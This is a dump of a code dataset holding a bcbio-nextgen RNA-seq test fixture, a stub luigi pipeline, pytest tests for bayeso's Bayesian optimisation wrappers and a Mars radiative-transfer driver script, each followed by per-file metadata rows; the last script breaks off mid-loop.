            '/bcbio-nextgen/tests/data/genomes/hg19/coverage/problem_regions/GA4GH/test2.bed.gz'
        ],
        'fasta': {
            'base': '/bcbio-nextgen/tests/data/genomes/hg19/seq/hg19.fa'
        },
        'star': {
            'indexes': [
                '/bcbio-nextgen/tests/data/genomes/hg19/star/chrLength.txt',
                '/bcbio-nextgen/tests/data/genomes/hg19/star/sjdbList.out.tab',
                '/bcbio-nextgen/tests/data/genomes/hg19/star/SA',
                '/bcbio-nextgen/tests/data/genomes/hg19/star/Genome',
                '/bcbio-nextgen/tests/data/genomes/hg19/star/SAindex',
                '/bcbio-nextgen/tests/data/genomes/hg19/star/chrStart.txt',
                '/bcbio-nextgen/tests/data/genomes/hg19/star/chrName.txt',
                '/bcbio-nextgen/tests/data/genomes/hg19/star/chrNameLength.txt',
                '/bcbio-nextgen/tests/data/genomes/hg19/star/genomeParameters.txt',
                '/bcbio-nextgen/tests/data/genomes/hg19/star/Log.out'
            ]
        },
        'rtg': '/bcbio-nextgen/tests/data/genomes/hg19/rtg/hg19.sdf'
    },
    'sam_ref': '/bcbio-nextgen/tests/data/genomes/hg19/seq/hg19.fa',
    # Annotation / variation resources grouped by analysis area.
    'genome_resources': {
        'rnaseq': {
            'transcripts': '/bcbio-nextgen/tests/data/genomes/hg19/rnaseq/ref-transcripts.gtf',
            'transcripts_mask': '/bcbio-nextgen/tests/data/genomes/hg19/rnaseq/ref-transcripts-mask.gtf',
            'gene_bed': '/bcbio-nextgen/tests/data/genomes/hg19/rnaseq/ref-transcripts.bed'
        },
        'version': 7,
        'variation': {
            'train_omni': '/bcbio-nextgen/tests/data/genomes/hg19/variation/1000G_omni2.5.vcf.gz',
            'dbnsfp': '/bcbio-nextgen/tests/data/genomes/hg19/variation/dbNSFP_v2.5.gz',
            'cosmic': '/bcbio-nextgen/tests/data/genomes/hg19/variation/cosmic-v68-hg19.vcf.gz',
            'ancestral': '/bcbio-nextgen/tests/data/genomes/hg19/variation/human_ancestor.fa',
            'train_hapmap': '/bcbio-nextgen/tests/data/genomes/hg19/variation/hapmap_3.3.vcf.gz',
            'train_1000g': '/bcbio-nextgen/tests/data/genomes/hg19/variation/1000G_phase1.snps.high_confidence.vcf.gz',
            'dbsnp': '/bcbio-nextgen/tests/data/genomes/hg19/variation/dbsnp_132.vcf.gz',
            'train_indels': '/bcbio-nextgen/tests/data/genomes/hg19/variation/Mills_Devine_2hit.indels.vcf.gz'
        },
        'srnaseq': {
            # NOTE(review): 'srna-trasncripts' spelling kept as-is — it is a
            # lookup key, so "fixing" it here would break consumers.
            'srna-trasncripts': '/bcbio-nextgen/tests/data/genomes/hg19/srnaseq/srna-transcripts.gtf',
            'mirbase': '/bcbio-nextgen/tests/data/genomes/hg19/srnaseq/hairpin.fa'
        },
        'aliases': {
            'snpeff': 'hg19',
            'human': True,
            'ensembl': 'homo_sapiens_vep_83_GRCh37'
        }
    },
    'provenance': {
        'data': '/bcbio-nextgen/tests/test_automated_output/provenance/data_versions.csv',
        'entity': 'bcdd2c84-b800-11e6-a323-0242ac110002.prepare_sample.0.trim_sample.0.process_alignment.0',
        'db': None,
        'programs': '/bcbio-nextgen/tests/test_automated_output/provenance/programs.txt'
    },
    # Read-group naming; duplicates the top-level NAMES fixture.
    'rgnames': {
        'lane': 'Test1',
        'lb': None,
        'pu': 'Test1',
        'sample': 'Test1',
        'rg': 'Test1',
        'pl': 'illumina'
    },
    'upload': {
        'dir': '/bcbio-nextgen/tests/test_automated_output/upload',
        'run_id': ''
    },
    'analysis': 'RNA-seq',
    'name': ['', 'Test1'],
    'genome_build': 'hg19',
    # Runtime configuration: per-program resource limits plus the
    # 'algorithm' section controlling pipeline behavior.
    'config': {
        'galaxy_config': '/bcbio-nextgen/tests/data/automated/universe_wsgi.ini',
        'resources': {
            'gatk': {
                'jvm_opts': ['-Xms500m', '-Xmx3500m']
            },
            'default': {
                'cores': 16,
                'jvm_opts': ['-Xms750m', '-Xmx3500m'],
                'memory': '3G'
            },
            'express': {'memory': '8g'},
            'seqcluster': {'memory': '8g'},
            'program_versions': '/bcbio-nextgen/tests/test_automated_output/provenance/programs.txt',
            'dexseq': {'memory': '10g'},
            'macs2': {'memory': '8g'},
            'snpeff': {
                'jvm_opts': ['-Xms750m', '-Xmx4g']
            },
            'qualimap': {'memory': '4g'}
        },
        'log_dir': '/var/log/bcbio',
        'algorithm': {
            'nomap_split_targets': 200,
            'trim_reads': 'read_through',
            'qc': ['fastqc', 'qualimap_rnaseq', 'samtools', 'gemini'],
            'archive': [],
            'recalibrate': False,
            'mark_duplicates': True,
            'nomap_split_size': 250,
            'quality_format': 'illumina',
            'aligner': 'star',
            'validate_regions': None,
            'realign': False,
            'tools_off': [],
            'fusion_mode': True,
            'variant_regions': None,
            'coverage_interval': None,
            'adapters': ['truseq', 'polya'],
            'validate': None, 'num_cores': 1, 'tools_on': []
        },
        'bcbio_system': '/bcbio-nextgen/tests/test_automated_output/bcbio_system-merged.yaml'
    },
    'resources': {},
    'metadata': {
        'batch': None,
        'phenotype': ''
    }
}
# Fixture: the same Test1 sample as DATA above, but in the nested
# [[{...}]] shape (list of lanes, each a list of sample dicts) and with
# keys in sorted, pprint-style order. Adds 'align_bam', 'work_bam',
# 'transcriptome_bam' and 'hla' entries not present in DATA, and a
# different 'provenance' entity id.
CONFIG = [[{'align_bam': '/bcbio-nextgen/tests/test_automated_output/align/Test1/Test1_star/Test1.bam',
            'analysis': 'RNA-seq',
            'config': {'algorithm': {'adapters': ['truseq', 'polya'],
                                     'aligner': 'star',
                                     'archive': [],
                                     'coverage_interval': None,
                                     'fusion_mode': True,
                                     'mark_duplicates': True,
                                     'nomap_split_size': 250,
                                     'nomap_split_targets': 200,
                                     'num_cores': 1,
                                     'qc': ['fastqc',
                                            'qualimap_rnaseq',
                                            'samtools',
                                            'gemini'],
                                     'quality_format': 'illumina',
                                     'realign': False,
                                     'recalibrate': False,
                                     'tools_off': [],
                                     'tools_on': [],
                                     'trim_reads': 'read_through',
                                     'validate': None,
                                     'validate_regions': None,
                                     'variant_regions': None},
                       'bcbio_system': '/bcbio-nextgen/tests/test_automated_output/bcbio_system-merged.yaml',
                       'galaxy_config': '/bcbio-nextgen/tests/data/automated/universe_wsgi.ini',
                       'log_dir': '/var/log/bcbio',
                       'resources': {'default': {'cores': 16,
                                                 'jvm_opts': ['-Xms750m',
                                                              '-Xmx3500m'],
                                                 'memory': '3G'},
                                     'dexseq': {'memory': '10g'},
                                     'express': {'memory': '8g'},
                                     'gatk': {'jvm_opts': ['-Xms500m',
                                                           '-Xmx3500m']},
                                     'macs2': {'memory': '8g'},
                                     'program_versions': '/bcbio-nextgen/tests/test_automated_output/provenance/programs.txt',
                                     'qualimap': {'memory': '4g'},
                                     'seqcluster': {'memory': '8g'},
                                     'snpeff': {'jvm_opts': ['-Xms750m', '-Xmx4g']}}},
            'description': 'Test1',
            'dirs': {'config': '/bcbio-nextgen/tests/test_automated_output',
                     'fastq': '/bcbio-nextgen/tests/data/test_fusion',
                     'flowcell': '/bcbio-nextgen/tests/data/test_fusion',
                     'galaxy': '/bcbio-nextgen/tests/data/automated',
                     'work': '/bcbio-nextgen/tests/test_automated_output'},
            'files': ['/bcbio-nextgen/tests/test_automated_output/trimmed/1_1_Test1.trimmed.fq.gz',
                      '/bcbio-nextgen/tests/test_automated_output/trimmed/1_2_Test1.trimmed.fq.gz'],
            'genome_build': 'hg19',
            'genome_resources': {'aliases': {'ensembl': 'homo_sapiens_vep_83_GRCh37',
                                             'human': True,
                                             'snpeff': 'hg19'},
                                 'rnaseq': {'gene_bed': '/bcbio-nextgen/tests/data/genomes/hg19/rnaseq/ref-transcripts.bed',
                                            'transcripts': '/bcbio-nextgen/tests/data/genomes/hg19/rnaseq/ref-transcripts.gtf',
                                            'transcripts_mask': '/bcbio-nextgen/tests/data/genomes/hg19/rnaseq/ref-transcripts-mask.gtf'},
                                 # NOTE(review): 'srna-trasncripts' typo is a lookup key; kept as-is.
                                 'srnaseq': {'mirbase': '/bcbio-nextgen/tests/data/genomes/hg19/srnaseq/hairpin.fa',
                                             'srna-trasncripts': '/bcbio-nextgen/tests/data/genomes/hg19/srnaseq/srna-transcripts.gtf'},
                                 'variation': {'ancestral': '/bcbio-nextgen/tests/data/genomes/hg19/variation/human_ancestor.fa',
                                               'cosmic': '/bcbio-nextgen/tests/data/genomes/hg19/variation/cosmic-v68-hg19.vcf.gz',
                                               'dbnsfp': '/bcbio-nextgen/tests/data/genomes/hg19/variation/dbNSFP_v2.5.gz',
                                               'dbsnp': '/bcbio-nextgen/tests/data/genomes/hg19/variation/dbsnp_132.vcf.gz',
                                               'train_1000g': '/bcbio-nextgen/tests/data/genomes/hg19/variation/1000G_phase1.snps.high_confidence.vcf.gz',
                                               'train_hapmap': '/bcbio-nextgen/tests/data/genomes/hg19/variation/hapmap_3.3.vcf.gz',
                                               'train_indels': '/bcbio-nextgen/tests/data/genomes/hg19/variation/Mills_Devine_2hit.indels.vcf.gz',
                                               'train_omni': '/bcbio-nextgen/tests/data/genomes/hg19/variation/1000G_omni2.5.vcf.gz'},
                                 'version': 7},
            'hla': {'fastq': None},
            'lane': '1',
            'metadata': {'batch': None, 'phenotype': ''},
            'name': ['', 'Test1'],
            'provenance': {'data': '/bcbio-nextgen/tests/test_automated_output/provenance/data_versions.csv',
                           'db': None,
                           'entity': '21efc524-bc79-11e6-a323-0242ac110002.prepare_sample.0.trim_sample.0.process_alignment.0',
                           'programs': '/bcbio-nextgen/tests/test_automated_output/provenance/programs.txt'},
            'reference': {'fasta': {'base': '/bcbio-nextgen/tests/data/genomes/hg19/seq/hg19.fa'},
                          'genome_context': ['/bcbio-nextgen/tests/data/genomes/hg19/coverage/problem_regions/GA4GH/test.bed.gz',
                                             '/bcbio-nextgen/tests/data/genomes/hg19/coverage/problem_regions/GA4GH/test2.bed.gz'],
                          'rtg': '/bcbio-nextgen/tests/data/genomes/hg19/rtg/hg19.sdf',
                          'star': {'indexes': ['/bcbio-nextgen/tests/data/genomes/hg19/star/chrLength.txt',
                                               '/bcbio-nextgen/tests/data/genomes/hg19/star/sjdbList.out.tab',
                                               '/bcbio-nextgen/tests/data/genomes/hg19/star/SA',
                                               '/bcbio-nextgen/tests/data/genomes/hg19/star/Genome',
                                               '/bcbio-nextgen/tests/data/genomes/hg19/star/SAindex',
                                               '/bcbio-nextgen/tests/data/genomes/hg19/star/chrStart.txt',
                                               '/bcbio-nextgen/tests/data/genomes/hg19/star/chrName.txt',
                                               '/bcbio-nextgen/tests/data/genomes/hg19/star/chrNameLength.txt',
                                               '/bcbio-nextgen/tests/data/genomes/hg19/star/genomeParameters.txt',
                                               '/bcbio-nextgen/tests/data/genomes/hg19/star/Log.out']}},
            'resources': {},
            'rgnames': {'lane': 'Test1',
                        'lb': None,
                        'pl': 'illumina',
                        'pu': 'Test1',
                        'rg': 'Test1',
                        'sample': 'Test1'},
            'sam_ref': '/bcbio-nextgen/tests/data/genomes/hg19/seq/hg19.fa',
            'transcriptome_bam': None,
            'upload': {'dir': '/bcbio-nextgen/tests/test_automated_output/upload',
                       'run_id': ''},
            'work_bam': '/bcbio-nextgen/tests/test_automated_output/align/Test1/Test1_star/Test1.bam'}]]
| 52.94332
| 145
| 0.522826
| 1,261
| 13,077
| 5.289453
| 0.164948
| 0.151124
| 0.214093
| 0.201499
| 0.832534
| 0.815292
| 0.795802
| 0.763418
| 0.763418
| 0.750225
| 0
| 0.040013
| 0.31391
| 13,077
| 246
| 146
| 53.158537
| 0.703411
| 0
| 0
| 0.438525
| 0
| 0.07377
| 0.57062
| 0.406668
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a5103818918178054e89e2f1e45e4a4e9274ca84
| 986
|
py
|
Python
|
es_luigi/es_luigi.py
|
chrisheckler/pipeline_dev
|
3dbf40dc0865f5b96ac559e942b40060e9d83aba
|
[
"MIT"
] | null | null | null |
es_luigi/es_luigi.py
|
chrisheckler/pipeline_dev
|
3dbf40dc0865f5b96ac559e942b40060e9d83aba
|
[
"MIT"
] | null | null | null |
es_luigi/es_luigi.py
|
chrisheckler/pipeline_dev
|
3dbf40dc0865f5b96ac559e942b40060e9d83aba
|
[
"MIT"
] | 1
|
2019-12-01T22:42:52.000Z
|
2019-12-01T22:42:52.000Z
|
#!/usr/bin/env python3
import luigi
import json
class Stage0(luigi.Task):
    """Pipeline stage 0: placeholder task, not wired up yet."""

    input_file = luigi.Parameter()

    def requires(self):
        # No upstream dependency yet.
        return None

    def output(self):
        # No output target yet.
        return None

    def run(self):
        # No work performed yet.
        return None
class Stage1(luigi.Task):
    """Pipeline stage 1: placeholder task, not wired up yet."""

    input_file = luigi.Parameter()

    def requires(self):
        # No upstream dependency yet.
        return None

    def output(self):
        # No output target yet.
        return None

    def run(self):
        # No work performed yet.
        return None
class Stage2(luigi.Task):
    """Pipeline stage 2: placeholder task, not wired up yet."""

    input_file = luigi.Parameter()

    def requires(self):
        # No upstream dependency yet.
        return None

    def output(self):
        # No output target yet.
        return None

    def run(self):
        # No work performed yet.
        return None
class Stage3(luigi.Task):
    """Pipeline stage 3: placeholder task, not wired up yet."""

    input_file = luigi.Parameter()

    def requires(self):
        # No upstream dependency yet.
        return None

    def output(self):
        # No output target yet.
        return None

    def run(self):
        # No work performed yet.
        return None
class Stage4(luigi.Task):
    """Pipeline stage 4: placeholder task, not wired up yet."""

    input_file = luigi.Parameter()

    def requires(self):
        # No upstream dependency yet.
        return None

    def output(self):
        # No output target yet.
        return None

    def run(self):
        # No work performed yet.
        return None
# Hand control to luigi's CLI runner (task name and parameters from argv).
if __name__=="__main__":
    luigi.run()
| 15.40625
| 34
| 0.570994
| 113
| 986
| 4.867257
| 0.230089
| 0.272727
| 0.236364
| 0.163636
| 0.836364
| 0.836364
| 0.836364
| 0.836364
| 0.836364
| 0.836364
| 0
| 0.009077
| 0.329615
| 986
| 63
| 35
| 15.650794
| 0.822995
| 0.021298
| 0
| 0.795455
| 0
| 0
| 0.008316
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.340909
| false
| 0
| 0.045455
| 0.340909
| 0.954545
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 13
|
eb5ef5c9cd4af15d249d14b5c048fdeb73375c19
| 9,371
|
py
|
Python
|
tests/common/test_wrappers_bo_function.py
|
jungtaekkim/bayeso
|
d11c9ff8037cf7fd3f9b41362eaab120f1224c71
|
[
"MIT"
] | 76
|
2018-01-18T03:03:14.000Z
|
2022-02-07T06:41:41.000Z
|
tests/common/test_wrappers_bo_function.py
|
POSTECH-CVLab/bayeso
|
d11c9ff8037cf7fd3f9b41362eaab120f1224c71
|
[
"MIT"
] | 20
|
2018-06-29T16:48:03.000Z
|
2021-04-19T00:30:57.000Z
|
tests/common/test_wrappers_bo_function.py
|
POSTECH-CVLab/bayeso
|
d11c9ff8037cf7fd3f9b41362eaab120f1224c71
|
[
"MIT"
] | 4
|
2020-01-07T06:24:17.000Z
|
2021-06-11T06:21:42.000Z
|
#
# author: Jungtaek Kim (jtkim@postech.ac.kr)
# last updated: July 9, 2021
#
"""test_wrappers_bo_function"""
import typing
import pytest
import numpy as np
from bayeso import bo
from bayeso.wrappers import wrappers_bo_function as package_target
def test_run_single_round_with_all_initial_information_typing():
    """Check the declared type annotations of
    run_single_round_with_all_initial_information."""
    annos = package_target.run_single_round_with_all_initial_information.__annotations__

    # Expected annotation for every parameter plus the return value.
    expected = {
        'model_bo': bo.BO,
        'fun_target': typing.Callable,
        'X_train': np.ndarray,
        'Y_train': np.ndarray,
        'num_iter': int,
        'str_sampling_method_ao': str,
        'num_samples_ao': int,
        'str_mlm_method': str,
        'return': typing.Tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray],
    }
    for name, annotation in expected.items():
        assert annos[name] == annotation
def test_run_single_round_with_all_initial_information():
    """Validate argument checking and result shapes of
    run_single_round_with_all_initial_information."""
    np.random.seed(42)
    arr_range = np.array([
        [-5.0, 5.0],
    ])
    dim_X = arr_range.shape[0]
    num_X = 3
    num_iter = 10
    X = np.random.randn(num_X, dim_X)
    Y = np.random.randn(num_X, 1)
    fun_target = lambda x: 2.0 * x + 1.0
    model_bo = bo.BO(arr_range)

    # Each entry is (positional args, keyword args) that must fail validation.
    # Order matters: the np.random.randn calls below consume the seeded RNG
    # stream in the same sequence as the original call sites.
    invalid_calls = [
        ((1, fun_target, X, Y, num_iter), {}),
        ((model_bo, 1, X, Y, num_iter), {}),
        ((model_bo, fun_target, 1, Y, num_iter), {}),
        ((model_bo, fun_target, X, 1, num_iter), {}),
        ((model_bo, fun_target, X, Y, 'abc'), {}),
        ((model_bo, fun_target, np.random.randn(num_X), Y, num_iter), {}),
        ((model_bo, fun_target, X, np.random.randn(num_X), num_iter), {}),
        ((model_bo, fun_target, np.random.randn(2, dim_X), Y, num_iter), {}),
        ((model_bo, fun_target, X, np.random.randn(num_X, 2), num_iter), {}),
        ((model_bo, fun_target, X, Y, num_iter), {'str_sampling_method_ao': 1}),
        ((model_bo, fun_target, X, Y, num_iter), {'str_sampling_method_ao': 'abc'}),
        ((model_bo, fun_target, X, Y, num_iter), {'num_samples_ao': 'abc'}),
    ]
    for args, kwargs in invalid_calls:
        with pytest.raises(AssertionError):
            package_target.run_single_round_with_all_initial_information(*args, **kwargs)

    X_final, Y_final, time_all_final, time_surrogate_final, time_acq_final = \
        package_target.run_single_round_with_all_initial_information(
            model_bo, fun_target, X, Y, num_iter)

    assert X_final.ndim == 2
    assert Y_final.ndim == 2
    assert time_all_final.ndim == 1
    assert time_surrogate_final.ndim == 1
    assert time_acq_final.ndim == 1
    assert X_final.shape[1] == dim_X
    assert X_final.shape[0] == Y_final.shape[0] == num_X + num_iter
    assert time_all_final.shape[0] == num_iter
    assert Y_final.shape[1] == 1
    assert time_surrogate_final.shape[0] == time_acq_final.shape[0]
def test_run_single_round_with_initial_inputs_typing():
    """Check the declared type annotations of run_single_round_with_initial_inputs."""
    annos = package_target.run_single_round_with_initial_inputs.__annotations__

    # Expected annotation for every parameter plus the return value.
    expected = {
        'model_bo': bo.BO,
        'fun_target': typing.Callable,
        'X_train': np.ndarray,
        'num_iter': int,
        'str_sampling_method_ao': str,
        'num_samples_ao': int,
        'str_mlm_method': str,
        'return': typing.Tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray],
    }
    for name, annotation in expected.items():
        assert annos[name] == annotation
def test_run_single_round_with_initial_inputs():
    """Validate argument checking and result shapes of
    run_single_round_with_initial_inputs."""
    np.random.seed(42)
    arr_range = np.array([
        [-5.0, 5.0],
    ])
    dim_X = arr_range.shape[0]
    num_X = 3
    num_iter = 10
    X = np.random.randn(num_X, dim_X)
    fun_target = lambda x: x**2 - 2.0 * x + 1.0
    model_bo = bo.BO(arr_range)

    # Each entry is (positional args, keyword args) that must fail validation.
    # np.random.randn below consumes the seeded RNG stream in original order.
    invalid_calls = [
        ((1, fun_target, X, num_iter), {}),
        ((model_bo, 1, X, num_iter), {}),
        ((model_bo, fun_target, 1, num_iter), {}),
        ((model_bo, fun_target, X, 1.2), {}),
        ((model_bo, fun_target, np.random.randn(num_X), num_iter), {}),
        ((model_bo, fun_target, X, num_iter), {'str_sampling_method_ao': 1}),
        ((model_bo, fun_target, X, num_iter), {'str_sampling_method_ao': 'abc'}),
        ((model_bo, fun_target, X, num_iter), {'num_samples_ao': 'abc'}),
    ]
    for args, kwargs in invalid_calls:
        with pytest.raises(AssertionError):
            package_target.run_single_round_with_initial_inputs(*args, **kwargs)

    X_final, Y_final, time_all_final, time_surrogate_final, time_acq_final = \
        package_target.run_single_round_with_initial_inputs(
            model_bo, fun_target, X, num_iter)

    assert X_final.ndim == 2
    assert Y_final.ndim == 2
    assert time_all_final.ndim == 1
    assert time_surrogate_final.ndim == 1
    assert time_acq_final.ndim == 1
    assert X_final.shape[1] == dim_X
    assert X_final.shape[0] == Y_final.shape[0] == time_all_final.shape[0] == num_X + num_iter
    assert Y_final.shape[1] == 1
    assert time_surrogate_final.shape[0] == time_acq_final.shape[0]
def test_run_single_round_typing():
    """Check the declared type annotations of run_single_round."""
    annos = package_target.run_single_round.__annotations__

    # Expected annotation for every parameter plus the return value.
    expected = {
        'model_bo': bo.BO,
        'fun_target': typing.Callable,
        'num_init': int,
        'num_iter': int,
        'str_sampling_method_ao': str,
        'num_samples_ao': int,
        'str_mlm_method': str,
        'seed': typing.Union[int, type(None)],
        'return': typing.Tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray],
    }
    for name, annotation in expected.items():
        assert annos[name] == annotation
def test_run_single_round():
    """Validate argument checking and result shapes of run_single_round."""
    np.random.seed(42)
    arr_range = np.array([
        [-5.0, 5.0],
    ])
    dim_X = arr_range.shape[0]
    num_X = 3
    num_iter = 10
    fun_target = lambda x: x**2 - 2.0 * x + 1.0
    model_bo = bo.BO(arr_range, debug=True)

    # Each entry is (positional args, keyword args) that must fail validation.
    invalid_calls = [
        ((1, fun_target, num_X, num_iter), {}),
        ((model_bo, 1, num_X, num_iter), {}),
        ((model_bo, fun_target, 1.2, num_iter), {}),
        ((model_bo, fun_target, num_X, 1.2), {}),
        ((model_bo, fun_target, num_X, num_iter), {'str_initial_method_bo': 1}),
        ((model_bo, fun_target, num_X, num_iter), {'str_initial_method_bo': 'abc'}),
        ((model_bo, fun_target, num_X, num_iter), {'str_initial_method_bo': 'grid'}),
        ((model_bo, fun_target, num_X, num_iter), {'str_sampling_method_ao': 1}),
        ((model_bo, fun_target, num_X, num_iter), {'str_sampling_method_ao': 'abc'}),
        ((model_bo, fun_target, num_X, num_iter), {'seed': 1.2}),
    ]
    for args, kwargs in invalid_calls:
        with pytest.raises(AssertionError):
            package_target.run_single_round(*args, **kwargs)

    X_final, Y_final, time_all_final, time_surrogate_final, time_acq_final = \
        package_target.run_single_round(
            model_bo, fun_target, num_X, num_iter, str_initial_method_bo='uniform')

    assert X_final.ndim == 2
    assert Y_final.ndim == 2
    assert time_all_final.ndim == 1
    assert time_surrogate_final.ndim == 1
    assert time_acq_final.ndim == 1
    assert X_final.shape[1] == dim_X
    assert X_final.shape[0] == Y_final.shape[0] == time_all_final.shape[0] == num_X + num_iter
    assert Y_final.shape[1] == 1
    assert time_surrogate_final.shape[0] == time_acq_final.shape[0]
| 50.654054
| 180
| 0.74197
| 1,465
| 9,371
| 4.379522
| 0.060751
| 0.058915
| 0.091646
| 0.123441
| 0.956359
| 0.951995
| 0.946384
| 0.940461
| 0.922849
| 0.903834
| 0
| 0.014134
| 0.154413
| 9,371
| 184
| 181
| 50.929348
| 0.795558
| 0.010244
| 0
| 0.658385
| 0
| 0
| 0.033564
| 0.007123
| 0
| 0
| 0
| 0
| 0.521739
| 1
| 0.037267
| false
| 0
| 0.031056
| 0
| 0.068323
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
eb8080ca016d89fd596bd2ca83cf64aee487c36e
| 16,248
|
py
|
Python
|
run_radiativetransfer.py
|
sukritranjan/ranjanwordsworthsasselov2016
|
bd5de2cb081b129bfd6b3b5bc173ca4e9ce7702b
|
[
"MIT"
] | 1
|
2017-12-14T03:48:22.000Z
|
2017-12-14T03:48:22.000Z
|
run_radiativetransfer.py
|
sukritranjan/ranjanwordsworthsasselov2016
|
bd5de2cb081b129bfd6b3b5bc173ca4e9ce7702b
|
[
"MIT"
] | null | null | null |
run_radiativetransfer.py
|
sukritranjan/ranjanwordsworthsasselov2016
|
bd5de2cb081b129bfd6b3b5bc173ca4e9ce7702b
|
[
"MIT"
] | null | null | null |
# -*- coding: iso-8859-1 -*-
"""
Purpose of this file is to run the uv_radtrans function from radiativetransfer.py to generate the surface radiance calculations used to derive the results in our paper.
This script: run for the Mars-approximate case (A=desert)
"""
import radiativetransfer as rt
import numpy as np
import pdb  # NOTE(review): unused here -- presumably a leftover debugging aid.
##################################
###First, validation cases
##################################
####Replicate Rugheimer+2015 3.9 Ga young Earth calculation.
#rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel='rugheimer_earth_epoch0', outputfilelabel='reproduce_rugheimer', inputspectrafile='general_youngsun_earth_spectral_input.dat',TDXC=False, DeltaScaling=False, SZA_deg=60., albedoflag='uniformalbedo',uniformalbedo=0.2, includedust=False, includeco2cloud=False,includeh2ocloud=False)
##Replicate Rugheimer+2015 3.9 Ga young Earth calculation using Rugheimer cross-sections
rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel='rugheimer_earth_epoch0', outputfilelabel='reproduce_rugheimer_rugheimerXCs', inputspectrafile='general_youngsun_earth_spectral_input.dat',TDXC=False, DeltaScaling=False, SZA_deg=60., albedoflag='uniformalbedo',uniformalbedo=0.2, includedust=False, includeco2cloud=False,includeh2ocloud=False) ###NEED TO UNCOMMENT RUGHEIMER XCs BLOCK IN CODE -- BE SURE TO RE-COMMENT IT AFTERWARDS
#####Replicate Wuttke+2006 surface radiance measurement calculation
#rt.uv_radtrans(z_upper_limit=60.e5, z_step=60.e3, inputatmofilelabel='wuttke2006', outputfilelabel='reproduce_wuttke2006', inputspectrafile='modernsun_earth_wuttke2006.dat',TDXC=False, DeltaScaling=False, SZA_deg=51.2, albedoflag='nonuniformalbedo',nonuniformalbedo=np.array([0.,0.,0.,0.,1.]), includedust=False, includeco2cloud=False,includeh2ocloud=False)
#######################################################################################################################
#CO2-H2O Atmosphere (no clouds/dust)
#######################################################################################################################
#################
####Particulate-free atmospheres, no TDXC, no delta-scaling, variable P_0 and T_0, SZA=0, A=desert
#################
# Sweep surface pressure (0.02-2 bar) x surface temperature (210-300 K).
inputatmofilelabel_elt_list=np.array(['colddrymars_0.02bar_210K', 'colddrymars_0.02bar_250K', 'colddrymars_0.02bar_300K', 'colddrymars_0.2bar_210K', 'colddrymars_0.2bar_250K', 'colddrymars_0.2bar_300K','colddrymars_2bar_210K', 'colddrymars_2bar_250K', 'colddrymars_2bar_300K'])
for inputatmofilelabel_elt in inputatmofilelabel_elt_list:
    rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel=inputatmofilelabel_elt, outputfilelabel='z=0_A=desert_noTD_noDS_noparticles', inputspectrafile='general_youngsun_mars_spectral_input.dat',TDXC=False, DeltaScaling=False, SZA_deg=0., albedoflag='nonuniformalbedo',nonuniformalbedo=np.array([0.,0.,1.,0.,0.]), includedust=False, includeco2cloud=False,includeh2ocloud=False)
#################
####Particulate-free atmospheres, T_0=200, P_0=2e-5-2e-3, SZA=0, A=desert, with and without TD XCs
#################
inputatmofilelabel_elt_list=np.array(['colddrymars_0.00002bar_200K', 'colddrymars_0.0002bar_200K', 'colddrymars_0.002bar_200K'])
for inputatmofilelabel_elt in inputatmofilelabel_elt_list:
    #Without TDXCs:
    rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel=inputatmofilelabel_elt, outputfilelabel='z=0_A=desert_noTD_noDS_noparticles', inputspectrafile='general_youngsun_mars_spectral_input.dat',TDXC=False, DeltaScaling=False, SZA_deg=0., albedoflag='nonuniformalbedo',nonuniformalbedo=np.array([0.,0.,1.,0.,0.]), includedust=False, includeco2cloud=False,includeh2ocloud=False)
    #with TDXCs
    rt.uv_radtrans(z_upper_limit=64.e5, z_step=1.e5, inputatmofilelabel=inputatmofilelabel_elt, outputfilelabel='z=0_A=desert_TD_noDS_noparticles', inputspectrafile='general_youngsun_mars_spectral_input.dat',TDXC=True, DeltaScaling=False, SZA_deg=0., albedoflag='nonuniformalbedo',nonuniformalbedo=np.array([0.,0.,1.,0.,0.]), includedust=False, includeco2cloud=False,includeh2ocloud=False)
#########################################################################################################################
###CO2-H2O Atmosphere (clouds)
#########################################################################################################################
##################
#####Atmospheres with H2O and CO2 clouds, T_0=250, P_0=0.02, SZA=0, A=desert, no TDXCs, yes delta scaling
##################
cloudtaulabel_list=np.array(['0.1', '1', '10', '100', '1000', '10000']) #list of cloud optical depths (500 nm)
cloudtauvalue_list=np.array([0.1, 1., 10., 100., 1000., 10000.]) #list of cloud optical depths (500 nm)
for ind in range(0, len(cloudtaulabel_list)):
    cloudtaulabel=cloudtaulabel_list[ind]
    cloudtauvalue=cloudtauvalue_list[ind]
    #H2O Clouds
